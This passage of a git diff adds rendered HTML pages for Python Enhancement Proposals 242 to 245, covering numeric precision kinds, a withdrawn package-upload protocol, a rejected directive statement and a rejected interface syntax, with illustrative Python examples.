No type exists corresponding to single or quad floats. It would +complicate the language to try to introduce such types directly +and their subsequent use would not be portable. This proposal is +similar to the Fortran 90 “kind” solution, adapted to the Python +environment. With this facility an entire calculation can be +switched from one level of precision to another by changing a +single line. If the desired precision does not exist on a +particular machine, the program will fail rather than get the +wrong answer. Since coding in this style would involve an early +call to the routine that will fail, this is the next best thing to +not compiling.

+
+
+

Supported Kinds of Ints and Floats

+

Complex numbers are treated separately below, since Python can be +built without them.

+

Each Python compiler may define as many “kinds” of integer and +floating point numbers as it likes, except that it must support at +least two kinds of integer corresponding to the existing int and +long, and must support at least one kind of floating point number, +equivalent to the present float.

+

The range and precision of these required kinds are processor +dependent, as at present, except for the “long integer” kind, +which can hold an arbitrary integer.

+

The built-in functions int(), long(), and float() convert inputs +to these default kinds as they do at present. (Note that a +Unicode string is actually a different “kind” of string and that a +sufficiently knowledgeable person might be able to expand this PEP +to cover that case.)

+

Within each type (integer, floating) the compiler supports a +linearly-ordered set of kinds, with the ordering determined by the +ability to hold numbers of an increased range and/or precision.

+
+
+

Kind Objects

+

Two new standard functions are defined in a module named “kinds”. +They return callable objects called kind objects. Each int or +floating kind object f has the signature result = f(x), and each +complex kind object has the signature result = f(x, y=0.).

+
+
int_kind(n)
For an integer argument n >= 1, return a callable object whose +result is an integer kind that will hold an integer number in +the open interval (-10**n, 10**n). The kind object accepts +arguments that are integers including longs. If n == 0, +returns the kind object corresponding to the Python literal 0.
+
float_kind(nd, n)
For nd >= 0 and n >= 1, return a callable object whose result +is a floating point kind that will hold a floating-point +number with at least nd digits of precision and a base-10 +exponent in the closed interval [-n, n]. The kind object +accepts arguments that are integer or float.

If nd and n are both zero, returns the kind object +corresponding to the Python literal 0.0.

+
+
+

The compiler will return a kind object corresponding to the least +of its available set of kinds for that type that has the desired +properties. If no kind with the desired qualities exists in a +given implementation an OverflowError exception is thrown. A kind +function converts its argument to the target kind, but if the +result does not fit in the target kind’s range, an OverflowError +exception is thrown.
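A sketch of that overflow behavior, using the API proposed above (note that the kinds module was never added to the standard library; see the note at the top of this PEP):

import kinds                      # the module proposed by this PEP; never shipped
single = kinds.float_kind(6, 90)  # >= 6 digits, exponent in [-90, 90]
x = single(1.0e88)                # fits: converted to the target kind
y = single(1.0e99)                # exponent 99 > 90: raises OverflowError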

+

Besides their callable behavior, kind objects have attributes +giving the traits of the kind in question.

+
    +
  1. name is the name of the kind. The standard kinds are called +int, long, double.
  2. +
  3. typecode is a single-letter string that would be appropriate +for use with Numeric or module array to form an array of this +kind. The standard types’ typecodes are ‘i’, ‘O’, ‘d’ +respectively.
  4. +
  5. Integer kinds have these additional attributes: MAX, equal to +the maximum permissible integer of this kind, or None for the +long kind. MIN, equal to the most negative permissible integer +of this kind, or None for the long kind.
  6. +
  7. Float kinds have these additional attributes whose properties +are equal to the corresponding value for the corresponding C +type in the standard header file “float.h”. MAX, MIN, DIG, +MANT_DIG, EPSILON, MAX_EXP, MAX_10_EXP, MIN_EXP, +MIN_10_EXP, RADIX, ROUNDS +(== FLT_RADIX, FLT_ROUNDS in float.h). These +values are of type integer except for MAX, MIN, and EPSILON, +which are of the Python floating type to which the kind +corresponds.
  8. +
+
+
+
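A sketch of reading these traits, again assuming the proposed (never-implemented) kinds module:

import kinds

d = kinds.float_kind(15, 300)   # a double-like kind on most platforms
print d.name                    # e.g. 'double'
print d.typecode                # e.g. 'd'
print d.DIG, d.MANT_DIG         # decimal/mantissa digits of precision
print d.MAX, d.MIN, d.EPSILON   # floats of the corresponding kind

i = kinds.int_kind(9)
print i.MAX, i.MIN              # bounds; None only for the long kind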

Attributes of Module kinds

+

int_kinds is a list of the available integer kinds, sorted from lowest +to highest kind. By definition, int_kinds[-1] is the long kind.

+

float_kinds is a list of the available floating point kinds, sorted +from lowest to highest kind.

+

default_int_kind is the kind object corresponding to the Python +literal 0

+

default_long_kind is the kind object corresponding to the Python +literal 0L

+

default_float_kind is the kind object corresponding to the Python +literal 0.0

+
+
+
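Purely as an illustration of these module attributes (same caveat as above — the kinds module is a proposal, not an implementation):

import kinds

# Kinds are sorted lowest to highest; the last integer kind is
# the unbounded long kind.
assert kinds.int_kinds[-1].name == 'long'

i = kinds.default_int_kind(42)      # the kind of the literal 0
l = kinds.default_long_kind(42L)    # the kind of the literal 0L
x = kinds.default_float_kind(4.2)   # the kind of the literal 0.0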

Complex Numbers

+

If supported, complex numbers have real and imaginary parts that +are floating-point numbers with the same kind. A Python compiler +must support a complex analog of each floating point kind it +supports, if it supports complex numbers at all.

+

If complex numbers are supported, the following are available in +module kinds:

+
+
complex_kind(nd, n)
Return a callable object whose result is a complex kind that +will hold a complex number each of whose components (.real, +.imag) is of kind float_kind(nd, n). The kind object will +accept one argument that is of any integer, real, or complex +kind, or two arguments, each integer or real.
+
+

complex_kinds is a list of the available complex kinds, sorted +from lowest to highest kind.

+

default_complex_kind is the kind object corresponding to the +Python literal 0.0j. The name of this kind +is doublecomplex, and its typecode is ‘D’.

+

Complex kind objects have these additional attributes:

+

floatkind is the kind object of the corresponding float type.

+
+
+

Examples

+

In module myprecision.py:

+
import kinds
+tinyint = kinds.int_kind(1)
+single = kinds.float_kind(6, 90)
+double = kinds.float_kind(15, 300)
+csingle = kinds.complex_kind(6, 90)
+
+
+

In the rest of my code:

+
from myprecision import tinyint, single, double, csingle
+n = tinyint(3)
+x = double(1.e20)
+z = 1.2
+# builtin float gets you the default float kind, properties unknown
+w = x * float(z)
+# but in the following case we know w has kind "double".
+w = x * double(z)
+
+u = csingle(x + z * 1.0j)
+u2 = csingle(x+z, 1.0)
+
+
+

Note how the entire code can then be changed to a higher precision just by changing the arguments in myprecision.py.

+

Comment: note that you aren’t promised that single != double; but +you are promised that double(1.e20) will hold a number with 15 +decimal digits of precision and a range up to 10**300 or that the +float_kind call will fail.

+
+
+

Open Issues

+

No open issues have been raised at this time.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0242.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0243/index.html b/pep-0243/index.html new file mode 100644 index 00000000000..87732a80360 --- /dev/null +++ b/pep-0243/index.html @@ -0,0 +1,278 @@ + + + + + + + + PEP 243 – Module Repository Upload Mechanism | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 243 – Module Repository Upload Mechanism

+
+
Author:
+
Sean Reifschneider <jafo-pep at tummy.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
18-Mar-2001
+
Python-Version:
+
2.1
+
Post-History:
+
20-Mar-2001, 24-Mar-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

For a module repository system (such as Perl’s CPAN) to be successful, it must be as easy as possible for module authors to submit their work. An obvious place for this submission to happen is in the Distutils tools after the distribution archive has been successfully created. For example, after a module author has tested their software (verifying the results of setup.py sdist), they might type setup.py sdist --submit. This would flag Distutils to submit the source distribution to the archive server for inclusion and distribution to the mirrors.

+

This PEP only deals with the mechanism for submitting the software +distributions to the archive, and does not deal with the actual +archive/catalog server.

+
+
+

Upload Process

+

The upload will include the Distutils PKG-INFO meta-data +information (as specified in PEP 241), the actual software +distribution, and other optional information. This information +will be uploaded as a multi-part form encoded the same as a +regular HTML file upload request. This form is posted using +ENCTYPE="multipart/form-data" encoding (RFC 1867).

+

The upload will be made to the host “www.python.org” on port 80/tcp (POST http://www.python.org:80/pypi). The form will consist of the following fields (a client-side sketch follows the list):

+
    +
  • distribution – The file containing the module software (for +example, a .tar.gz or .zip file).
  • +
  • distmd5sum – The MD5 hash of the uploaded distribution, +encoded in ASCII representing the hexadecimal representation +of the digest (for byte in digest: s = s + ('%02x' % +ord(byte))).
  • +
  • pkginfo (optional) – The file containing the distribution +meta-data (as specified in PEP 241). Note that if this is +not included, the distribution file is expected to be in .tar +format (gzipped and bzipped compressed are allowed) or .zip +format, with a PKG-INFO file in the top-level directory it +extracts (package-1.00/PKG-INFO).
  • +
  • infomd5sum (required if pkginfo field is present) – The MD5 hash +of the uploaded meta-data, encoded in ASCII representing the +hexadecimal representation of the digest (for byte in digest: +s = s + ('%02x' % ord(byte))).
  • +
  • platform (optional) – A string representing the target +platform for this distribution. This is only for binary +distributions. It is encoded as +<os_name>-<os_version>-<platform architecture>-<python +version>.
  • +
  • signature (optional) – An OpenPGP-compatible signature of the uploaded distribution as signed by the author. This may be used by the cataloging system to automate acceptance of uploads.
  • +
  • protocol_version – A string indicating the protocol version that +the client supports. This document describes protocol version “1”.
  • +
+
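The PEP specifies only the protocol, not client code; purely as an illustration, a minimal Python 2-era sketch of building such a multipart POST (the boundary, helper names, and filename below are invented) might look like this:

import httplib, md5

def hexdigest(data):
    # per the PEP: for byte in digest: s = s + ('%02x' % ord(byte))
    digest = md5.new(data).digest()
    s = ''
    for byte in digest:
        s = s + ('%02x' % ord(byte))
    return s

def upload(distdata, pkginfo=None):
    boundary = '----------PEP243-form-boundary'   # invented
    fields = [('protocol_version', '1'),
              ('distmd5sum', hexdigest(distdata))]
    files = [('distribution', 'package-1.00.tar.gz', distdata)]
    if pkginfo is not None:
        fields.append(('infomd5sum', hexdigest(pkginfo)))
        files.append(('pkginfo', 'PKG-INFO', pkginfo))
    lines = []
    for name, value in fields:
        lines.append('--' + boundary)
        lines.append('Content-Disposition: form-data; name="%s"' % name)
        lines.append('')
        lines.append(value)
    for name, filename, data in files:
        lines.append('--' + boundary)
        lines.append('Content-Disposition: form-data; name="%s"; '
                     'filename="%s"' % (name, filename))
        lines.append('')
        lines.append(data)
    lines.append('--' + boundary + '--')
    body = '\r\n'.join(lines) + '\r\n'
    conn = httplib.HTTPConnection('www.python.org', 80)
    conn.request('POST', '/pypi', body,
                 {'Content-Type':
                  'multipart/form-data; boundary=' + boundary})
    return conn.getresponse()

The response would then be inspected via the X-Swalow-* headers described in the next section.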
+
+

Return Data

+

The status of the upload will be reported using non-standard HTTP (X-*) headers. The X-Swalow-Status header may have the following values:

+
    +
  • SUCCESS – Indicates that the upload has succeeded.
  • +
  • FAILURE – The upload is, for some reason, unable to be +processed.
  • +
  • TRYAGAIN – The server is unable to accept the upload at this time, but the client should try again at a later time. Potential causes of this are resource shortages on the server, administrative down-time, etc.
  • +
+

Optionally, there may be an X-Swalow-Reason header which includes a human-readable string providing more detailed information about the X-Swalow-Status.

+

If there is no X-Swalow-Status header, or it does not contain one of +the three strings above, it should be treated as a temporary failure.

+

Example:

+
>>> f = urllib.urlopen('http://www.python.org:80/pypi')
+>>> s = f.headers['x-swalow-status']
+>>> s = s + ': ' + f.headers.get('x-swalow-reason', '<None>')
+>>> print s
+FAILURE: Required field "distribution" missing.
+
+
+
+
+

Sample Form

+

The upload client must submit the page in the same form as +Netscape Navigator version 4.76 for Linux produces when presented +with the following form:

+
<H1>Upload file</H1>
+<FORM NAME="fileupload" METHOD="POST" ACTION="pypi"
+    ENCTYPE="multipart/form-data">
+<INPUT TYPE="file" NAME="distribution"><BR>
+<INPUT TYPE="text" NAME="distmd5sum"><BR>
+<INPUT TYPE="file" NAME="pkginfo"><BR>
+<INPUT TYPE="text" NAME="infomd5sum"><BR>
+<INPUT TYPE="text" NAME="platform"><BR>
+<INPUT TYPE="text" NAME="signature"><BR>
+<INPUT TYPE="hidden" NAME="protocol_version" VALUE="1"><BR>
+<INPUT TYPE="SUBMIT" VALUE="Upload">
+</FORM>
+
+
+
+
+

Platforms

+

The following are valid os names:

+
aix beos debian dos freebsd hpux mac macos mandrake netbsd
+openbsd qnx redhat solaris suse windows yellowdog
+
+
+

The above include a number of different distributions of Linux. Because of versioning issues these must be split out; when it makes sense for one system to use distributions made on another, similar system, the download client is expected to make the distinction.

+

Version is the official version string specified by the vendor for +the particular release. For example, “2000” and “nt” (Windows), +“9.04” (HP-UX), “7.0” (RedHat, Mandrake).

+

The following are valid architectures:

+
alpha hppa ix86 powerpc sparc ultrasparc
+
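Combining the pieces above, hypothetical platform strings (illustrative, not taken from the PEP) would look like:

windows-2000-ix86-2.1
hpux-9.04-hppa-2.1
redhat-7.0-ix86-2.1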
+
+
+
+

Status

+

I currently have a proof-of-concept client and server implemented. +I plan to have the Distutils patches ready for the 2.1 release. +Combined with Andrew’s PEP 241 for specifying distribution +meta-data, I hope to have a platform which will allow us to gather +real-world data for finalizing the catalog system for the 2.2 +release.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0243.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0244/index.html b/pep-0244/index.html new file mode 100644 index 00000000000..ec7d923a66c --- /dev/null +++ b/pep-0244/index.html @@ -0,0 +1,264 @@ + + + + + + + + PEP 244 – The directive statement | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 244 – The directive statement

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
20-Mar-2001
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Motivation

+

From time to time, Python makes an incompatible change to the +advertised semantics of core language constructs, or changes their +accidental (implementation-dependent) behavior in some way. While +this is never done capriciously, and is always done with the aim +of improving the language over the long term, over the short term +it’s contentious and disrupting.

+

PEP 5, Guidelines for Language Evolution suggests ways to ease +the pain, and this PEP introduces some machinery in support of +that.

+

PEP 227, Statically Nested Scopes is the first application, and +will be used as an example here.

+

When a new, potentially incompatible language feature is added, some modules and libraries may choose to use it, while others may not. This specification introduces a syntax with which a module author can denote whether a certain language feature is used in the module or not.

+

In discussion of this PEP, readers commented that there are two +kinds of “settable” language features:

+
    +
  • those that are designed to eventually become the only option, at which time specifying use of them is not necessary anymore. The features for which the syntax of PEP 236, Back to the __future__, was proposed fall into this category. This PEP supports declaring such features, and supports phasing out the “old” meaning of constructs whose semantics have changed under the new feature. However, it defines no policy as to what features must be phased out eventually.
  • +
  • those which are designed to stay optional forever, e.g. if they +change some default setting in the interpreter. An example for +such settings might be the request to always emit line-number +instructions for a certain module; no specific flags of that +kind are proposed in this specification.
  • +
+

Since a primary goal of this PEP is to support new language +constructs without immediately breaking old libraries, special +care was taken not to break old libraries by introducing the new +syntax.

+
+
+

Syntax

+

A directive_statement is a statement of the form:

+
directive_statement: 'directive' NAME [atom] [';'] NEWLINE
+
+
+

The name in the directive indicates the kind of the directive; it +defines whether the optional atom can be present, and whether +there are further syntactical or semantical restrictions to the +atom. In addition, depending on the name of the directive, +certain additional syntactical or semantical restrictions may be +placed on the directive (e.g. placement of the directive in the +module may be restricted to the top of the module).

+

In the directive_statement, directive is a new +keyword. According to PEP 5, this keyword is initially considered as +a keyword only when used in a directive statement, see “Backwards +Compatibility” below.

+
+
+

Semantics

+

A directive statement instructs the Python interpreter to process +a source file in a different way; the specific details of that +processing depend on the directive name. The optional atom is +typically interpreted when the source code is processed; details +of that interpretation depend on the directive.

+
+
+

Specific Directives: transitional

+

If a syntactical or semantical change is added to Python which is +incompatible, PEP 5 mandates a transitional evolution of the +language, where the new feature is initially available alongside +with the old one. Such a transition is possible by means of the +transitional directive.

+

In a transitional directive, the NAME is ‘transitional’. The atom +MUST be present, and it MUST be a NAME. The possible values for +that name are defined when the language change is defined. One +example for such a directive is:

+
directive transitional nested_scopes
+
+
+

The transitional directive MUST occur before any other statement in a module, except for the documentation string (i.e. it may appear as the second statement of a module only if the first statement is a STRING+).
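For example, under the proposed (ultimately rejected) syntax, a module could look like this; the function bodies are illustrative:

"""Module docstring -- the only statement allowed before the directive."""
directive transitional nested_scopes

def outer():
    x = 1
    def inner():
        return x    # resolved via nested scopes under the directive
    return inner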

+
+
+

Backwards Compatibility

+

Introducing directive as a new keyword might cause +incompatibilities with existing code. Following the guideline in +PEP 5, in the initial implementation of this specification, +directive is a new keyword only if it was used in a valid +directive_statement (i.e. if it appeared as the first non-string +token in a module).

+
+
+

Unresolved Problems: directive as the first identifier

+

Using directive in a module as:

+
directive = 1
+
+
+

(i.e. the name directive appears as the first thing in a module) +will treat it as keyword, not as identifier. It would be possible +to classify it as a NAME with an additional look-ahead token, but +such look-ahead is not available in the Python tokenizer.

+
+
+

Questions and Answers

+

Q: It looks like this PEP was written to allow definition of source +code character sets. Is that true?

+

A: No. Even though the directive facility can be extended to +allow source code encodings, no specific directive is proposed.

+

Q: Then why was this PEP written at all?

+

A: It acts as a counter-proposal to PEP 236, which proposes to overload the import statement with a new meaning. This PEP allows the problem to be solved in a more general way.

+

Q: But isn’t mixing source encodings and language changes like +mixing apples and oranges?

+

A: Perhaps. To address the difference, the predefined +“transitional” directive has been defined.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0244.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0245/index.html b/pep-0245/index.html new file mode 100644 index 00000000000..24a4dedecaf --- /dev/null +++ b/pep-0245/index.html @@ -0,0 +1,619 @@ + + + + + + + + PEP 245 – Python Interface Syntax | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 245 – Python Interface Syntax

+
+
Author:
+
Michel Pelletier <michel at users.sourceforge.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Jan-2001
+
Python-Version:
+
2.2
+
Post-History:
+
21-Mar-2001
+
+
+
+
Table of Contents +
+
+

Note

+

The no-longer-available Zope interfaces wiki page +(https://www.zope.org/Wikis/Interfaces) originally linked here, +containing links to further resources for this PEP, +can be found on the Wayback Machine archive. +Also, the Interface-Dev Zope mailing list on which this PEP was discussed +was shut down, but its archives remain available.

+
+
+

Rejection Notice

+

I’m rejecting this PEP. It’s been five years now. While at some +point I expect that Python will have interfaces, it would be naive +to expect it to resemble the syntax in this PEP. Also, PEP 246 is +being rejected in favor of something completely different; interfaces +won’t play a role in adaptation or whatever will replace it. GvR.

+
+
+

Introduction

+

This PEP describes a proposed syntax for creating interface +objects in Python.

+
+
+

Overview

+

In addition to thinking about adding a static type system to +Python, the Types-SIG was also charged to devise an interface +system for Python. In December of 1998, Jim Fulton released a +prototype interfaces system based on discussions from the SIG. +Many of the issues and background information on this discussion +and prototype can be found in the SIG archives [1].

+

Around the end of 2000, Digital Creations began thinking about +better component model designs for Zope [2]. Zope’s future +component model relies heavily on interface objects. This led to +further development of Jim’s “Scarecrow” interfaces prototype. +Starting with version 2.3, Zope comes with an Interface package as +standard software. Zope’s Interface package is used as the +reference implementation for this PEP.

+

The syntax proposed by this PEP relies on syntax enhancements described in PEP 232 and describes an underlying framework which PEP 233 could be based upon. There is some work being done with regard to interface objects and Proxy objects, so for those optional parts of this PEP you may want to see [3].

+
+
+

The Problem

+

Interfaces are important because they solve a number of problems +that arise while developing software:

+
    +
  • There are many implied interfaces in Python, commonly referred +to as “protocols”. Currently determining those protocols is +based on implementation introspection, but often that also +fails. For example, defining __getitem__ implies both a +sequence and a mapping (the former with sequential, integer +keys). There is no way for the developer to be explicit about +which protocols the object intends to implement.
  • +
  • Python is limited, from the developer’s point of view, by the +split between types and classes. When types are expected, the +consumer uses code like ‘type(foo) == type(“”)’ to determine if +‘foo’ is a string. When instances of classes are expected, the +consumer uses ‘isinstance(foo, MyString)’ to determine if ‘foo’ +is an instance of the ‘MyString’ class. There is no unified +model for determining if an object can be used in a certain, +valid way.
  • +
  • Python’s dynamic typing is very flexible and powerful, but it +does not have the advantage of static typed languages that +provide type checking. Static typed languages provide you with +much more type safety, but are often overly verbose because +objects can only be generalized by common subclassing and used +specifically with casting (for example, in Java).
  • +
+

There are also a number of documentation problems that interfaces +try to solve.

+
    +
  • Developers waste a lot of time looking at the source code of +your system to figure out how objects work.
  • +
  • Developers who are new to your system may misunderstand how your +objects work, causing, and possibly propagating, usage errors.
  • +
  • Because a lack of interfaces means usage is inferred from the +source, developers may end up using methods and attributes that +are meant for “internal use only”.
  • +
  • Code inspection can be hard, and very discouraging to novice +programmers trying to properly understand code written by gurus.
  • +
  • A lot of time is wasted when many people try very hard to understand obscurity (like undocumented software). Effort spent up front documenting interfaces will save much of this time in the end.
  • +
+

Interfaces try to solve these problems by providing a way for you +to specify a contractual obligation for your object, documentation +on how to use an object, and a built-in mechanism for discovering +the contract and the documentation.

+

Python has very useful introspection features. It is well known +that this makes exploring concepts in the interactive interpreter +easier, because Python gives you the ability to look at all kinds +of information about the objects: the type, doc strings, instance +dictionaries, base classes, unbound methods and more.

+

Many of these features are oriented toward introspecting, using +and changing the implementation of software, and one of them (“doc +strings”) is oriented toward providing documentation. This +proposal describes an extension to this natural introspection +framework that describes an object’s interface.

+
+
+

Overview of the Interface Syntax

+

For the most part, the syntax of interfaces is very much like the +syntax of classes, but future needs, or needs brought up in +discussion, may define new possibilities for interface syntax.

+

A formal BNF description of the syntax is given later in the PEP; for the purposes of illustration, here is an example of two different interfaces created with the proposed syntax:

+
interface CountFishInterface:
+    "Fish counting interface"
+
+    def oneFish():
+        "Increments the fish count by one"
+
+    def twoFish():
+        "Increments the fish count by two"
+
+    def getFishCount():
+        "Returns the fish count"
+
+interface ColorFishInterface:
+    "Fish coloring interface"
+
+    def redFish():
+        "Sets the current fish color to red"
+
+    def blueFish():
+        "Sets the current fish color to blue"
+
+    def getFishColor():
+        "This returns the current fish color"
+
+
+

This code, when evaluated, will create two interfaces called +CountFishInterface and ColorFishInterface. These interfaces +are defined by the interface statement.

+

The prose documentation for the interfaces and their methods comes from doc strings. The method signature information comes from the signatures of the def statements. Notice how there is no body for the def statements. The interface does not implement a service to anything; it merely describes one. Documentation strings on interfaces and interface methods are mandatory; a ‘pass’ statement cannot be provided. The interface equivalent of a pass statement is an empty doc string, as the sketch below shows.
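For example, under the proposed syntax (never adopted; the interface name below is invented), a method with nothing to say would carry an empty doc string where a class would use pass:

interface MinimalInterface:
    "An illustrative interface with one undocumented method"

    def ping():
        ""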

+

You can also create interfaces that “extend” other interfaces. +Here, you can see a new type of Interface that extends the +CountFishInterface and ColorFishInterface:

+
interface FishMarketInterface(CountFishInterface, ColorFishInterface):
+    "This is the documentation for the FishMarketInterface"
+
+    def getFishMonger():
+        "Returns the fish monger you can interact with"
+
+    def hireNewFishMonger(name):
+        "Hire a new fish monger"
+
+    def buySomeFish(quantity=1):
+        "Buy some fish at the market"
+
+
+

The FishMarketInterface extends upon the CountFishInterface and ColorFishInterface.

+
+
+

Interface Assertion

+

The next step is to put classes and interfaces together by +creating a concrete Python class that asserts that it implements +an interface. Here is an example FishMarket component that might +do this:

+
class FishError(Exception):
+    pass
+
+class FishMarket implements FishMarketInterface:
+    number = 0
+    color = None
+    monger_name = 'Crusty Barnacles'
+
+    def __init__(self, number, color):
+        self.number = number
+        self.color = color
+
+    def oneFish(self):
+        self.number += 1
+
+    def twoFish(self):
+        self.number += 2
+
+    def redFish(self):
+        self.color = 'red'
+
+    def blueFish(self):
+        self.color = 'blue'
+
+    def getFishCount(self):
+        return self.number
+
+    def getFishColor(self):
+        return self.color
+
+    def getFishMonger(self):
+        return self.monger_name
+
+    def hireNewFishMonger(self, name):
+        self.monger_name = name
+
+    def buySomeFish(self, quantity=1):
+        if quantity > self.number:
+            raise FishError("There's not enough fish")
+        self.number -= quantity
+        return quantity
+
+
+

This new class, FishMarket defines a concrete class which +implements the FishMarketInterface. The object following the +implements statement is called an “interface assertion”. An +interface assertion can be either an interface object, or tuple of +interface assertions.

+

The interface assertion provided in a class statement like this +is stored in the class’s __implements__ class attribute. After +interpreting the above example, you would have a class statement +that can be examined like this with an ‘implements’ built-in +function:

+
>>> FishMarket
+<class FishMarket at 8140f50>
+>>> FishMarket.__implements__
+(<Interface FishMarketInterface at 81006f0>,)
+>>> f = FishMarket(6, 'red')
+>>> implements(f, FishMarketInterface)
+1
+>>>
+
+
+

A class can realize more than one interface. For example, say you +had an interface called ItemInterface that described how an +object worked as an item in a container object. If you wanted to +assert that FishMarket instances realized the ItemInterface +interface as well as the FishMarketInterface, you can provide an +interface assertion that contained a tuple of interface objects to +the FishMarket class:

+
class FishMarket implements FishMarketInterface, ItemInterface:
+    # ...
+
+
+

Interface assertions can also be used if you want to assert that +one class implements an interface, and all of the interfaces that +another class implements:

+
class MyFishMarket implements FishMarketInterface, ItemInterface:
+    # ...
+
+class YourFishMarket implements FooInterface, MyFishMarket.__implements__:
+    # ...
+
+
+

This new class, YourFishMarket, asserts that it implements the FooInterface, as well as the interfaces implemented by the MyFishMarket class.

+

It’s worth going into a little bit more detail about interface +assertions. An interface assertion is either an interface object, +or a tuple of interface assertions. For example:

+
FooInterface
+
+FooInterface, (BarInterface, BobInterface)
+
+FooInterface, (BarInterface, (BobInterface, MyClass.__implements__))
+
+
+

All of the above are valid interface assertions. When two interfaces define the same attributes, the order in which information is preferred in the assertion is top-to-bottom, left-to-right.

+

There are other interface proposals that, in the need for +simplicity, have combined the notion of class and interface to +provide simple interface enforcement. Interface objects have a +deferred method that returns a deferred class that implements +this behavior:

+
>>> FM = FishMarketInterface.deferred()
+>>> class MyFM(FM): pass
+
+>>> f = MyFM()
+>>> f.getFishMonger()
+Traceback (innermost last):
+  File "<stdin>", line 1, in ?
+Interface.Exceptions.BrokenImplementation:
+An object has failed to implement interface FishMarketInterface
+
+        The getFishMonger attribute was not provided.
+>>>
+
+
+

This provides for a bit of passive interface enforcement by +telling you what you forgot to do to implement that interface.

+
+
+

Formal Interface Syntax

+

Python syntax is defined in a modified BNF grammar notation +described in the Python Reference Manual [4]. This section +describes the proposed interface syntax using this grammar:

+
interfacedef:   "interface" interfacename [extends] ":" suite
+extends:        "(" [expression_list] ")"
+interfacename:  identifier
+
+
+

An interface definition is an executable statement. It first +evaluates the extends list, if present. Each item in the extends +list should evaluate to an interface object.

+

The interface’s suite is then executed in a new execution frame +(see the Python Reference Manual, section 4.1), using a newly +created local namespace and the original global namespace. When +the interface’s suite finishes execution, its execution frame is +discarded but its local namespace is saved as interface elements. +An interface object is then created using the extends list for the +base interfaces and the saved interface elements. The interface +name is bound to this interface object in the original local +namespace.

+

This PEP also proposes an extension to Python’s ‘class’ statement:

+
classdef:    "class" classname [inheritance] [implements] ":" suite
+implements:  "implements" implist
+implist:     expression-list
+
+classname,
+inheritance,
+suite,
+expression-list:  see the Python Reference Manual
+
+
+

Before a class’ suite is executed, the ‘inheritance’ and +‘implements’ statements are evaluated, if present. The +‘inheritance’ behavior is unchanged as defined in Section 7.6 of +the Language Reference.

+

The ‘implements’, if present, is evaluated after inheritance. +This must evaluate to an interface specification, which is either +an interface, or a tuple of interface specifications. If a valid +interface specification is present, the assertion is assigned to +the class object’s ‘__implements__’ attribute, as a tuple.

+

This PEP does not propose any changes to the syntax of function +definitions or assignments.

+
+
+

Classes and Interfaces

+

The example interfaces above do not describe any kind of behavior +for their methods, they just describe an interface that a typical +FishMarket object would realize.

+

You may notice a similarity between interfaces extending from +other interfaces and classes sub-classing from other classes. +This is a similar concept. However it is important to note that +interfaces extend interfaces and classes subclass classes. You +cannot extend a class or subclass an interface. Classes and +interfaces are separate.

+

The purpose of a class is to share the implementation of how an +object works. The purpose of an interface is to document how to +work with an object, not how the object is implemented. It is +possible to have several different classes with very different +implementations realize the same interface.

+

It’s also possible to implement one interface with many classes that each mix in pieces of the interface’s functionality or, conversely, to have one class implement many interfaces. Because of this, interfaces and classes should not be confused or intermingled.

+
+
+

Interface-aware built-ins

+

A useful extension to Python’s list of built-in functions in the +light of interface objects would be implements(). This builtin +would expect two arguments, an object and an interface, and return +a true value if the object implements the interface, false +otherwise. For example:

+
>>> interface FooInterface: pass
+>>> class Foo implements FooInterface: pass
+>>> f = Foo()
+>>> implements(f, FooInterface)
+1
+
+
+

Currently, this functionality exists in the reference implementation as functions in the Interface package, requiring an “import Interface” to use it. Its existence as a built-in would be purely a convenience, not necessary for using interfaces, and analogous to isinstance() for classes.

+
+
+

Backward Compatibility

+

The proposed interface model does not introduce any backward +compatibility issues in Python. The proposed syntax, however, +does.

+

Any existing code that uses interface as an identifier will break. There may be other kinds of backwards incompatibility that defining interface as a new keyword will introduce. Beyond the new keyword, however, this extension to Python’s syntax does not change any existing syntax in any backward incompatible way.

+

The new from __future__ Python syntax (PEP 236), and the new warning +framework (PEP 230) is ideal for resolving this backward +incompatibility. To use interface syntax now, a developer could +use the statement:

+
from __future__ import interfaces
+
+
+

In addition, any code that uses interface as an identifier will cause Python to issue a warning. After the appropriate period of time, the interface syntax would become standard, the above import statement would do nothing, and any identifiers named interface would raise an exception. This period of time is proposed to be 24 months.

+
+
+

Summary of Proposed Changes to Python

+

Adding a new interface keyword and extending the class syntax with implements.

+

Extending class interface to include __implements__.

+

Add ‘implements(obj, interface)’ built-in.

+
+
+

Risks

+

This PEP proposes adding one new keyword to the Python language, +interface. This will break code.

+
+
+

Open Issues

+
+

Goals

+
+
+

Syntax

+
+
+

Architecture

+
+
+
+

Dissenting Opinion

+

This PEP has not yet been discussed on python-dev.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0245.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
